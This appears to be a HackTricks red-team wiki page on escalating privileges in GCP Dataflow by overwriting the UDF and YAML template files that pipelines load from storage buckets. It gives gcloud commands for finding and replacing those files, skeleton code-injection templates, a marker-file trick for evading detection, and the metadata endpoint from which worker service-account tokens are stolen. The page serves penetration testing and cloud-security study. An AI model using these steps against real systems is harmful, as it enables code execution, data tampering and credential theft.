GCP - Dataflow Privilege Escalation

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Dataflow

GCP - Dataflow Enum

`storage.objects.create`, `storage.objects.get`, `storage.objects.update`

Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS. With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing. Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling).

Attack vectors:

UDF hijacking: Python (.py) and JS (.js) UDFs referenced by pipelines and stored in customer-managed buckets
Job template hijacking: Custom YAML pipeline definitions stored in customer-managed buckets

Warning

Run-once-per-worker trick: Dataflow UDFs and template callables are invoked per row/line. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a file-based coordination pattern: check if a marker file (e.g. /tmp/pwnd.txt) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs once per worker, not per line.

Direct exploitation via gcloud CLI

Enumerate Dataflow jobs and locate the template/UDF GCS paths:

List jobs and describe to get template path, staging location, and UDF references

# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>

# Describe a job to get template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath

Download the original UDF or job template from GCS:

Download UDF file or YAML template from bucket

# If job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py

# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml

Edit the file locally: inject the malicious payload (see Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.
Re-upload to overwrite the original file:

Overwrite UDF or template in bucket

gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py

# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml

Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.

Python UDF injection

If you want to have a the worker exfiltrate data to your C2 server use urllib.request and not requests. requests is not preinstalled on classic Dataflow workers.

Malicious UDF with run-once coordination and metadata extraction

import os
import json
import urllib.request
from datetime import datetime

def _malicious_func():
    # File-based coordination: run once per worker.
    coordination_file = "/tmp/pwnd.txt"
    if os.path.exists(coordination_file):
        return

    # malicous code goes here
    with open(coordination_file, "w", encoding="utf-8") as f:
        f.write("done")

def transform(line):
    # Malicous code entry point - runs per line but coordination ensures once per worker
    try:
        _malicious_func()
    except Exception:
        pass
    # ... original UDF logic follows ...

Job template YAML injection

Inject a MapToFields step with a callable that uses a coordination file. For YAML-based pipelines that support requests, use it if the template declares dependencies: [requests]; otherwise prefer urllib.request.

Add the cleanup step (drop: [malicious_step]) so the pipeline still writes valid data to the destination.

Malicious MapToFields step and cleanup in pipeline YAML

- name: MaliciousTransform
  type: MapToFields
  input: Transform
  config:
    language: python
    fields:
      malicious_step:
        callable: |
          def extract_and_return(row):
              import os
              import json
              from datetime import datetime
              coordination_file = "/tmp/pwnd.txt"
              if os.path.exists(coordination_file):
                  return True
              try:
                  import urllib.request
                  # malicious code goes here
                  with open(coordination_file, "w", encoding="utf-8") as f:
                      f.write("done")
              except Exception:
                  pass
              return True
    append: true
- name: CleanupTransform
  type: MapToFields
  input: MaliciousTransform
  config:
    fields: {}
    append: true
    drop:
      - malicious_step

Compute Engine access to Dataflow Workers

Permissions: compute.instances.osLogin or compute.instances.osAdminLogin (with iam.serviceAccounts.actAs over the worker SA), or compute.instances.setMetadata / compute.projects.setCommonInstanceMetadata (with iam.serviceAccounts.actAs) for legacy SSH key injection

Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token), manipulate data, or run arbitrary code.

For exploitation details, see:

GCP - Compute Privesc — compute.instances.osLogin, compute.instances.osAdminLogin, compute.instances.setMetadata

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.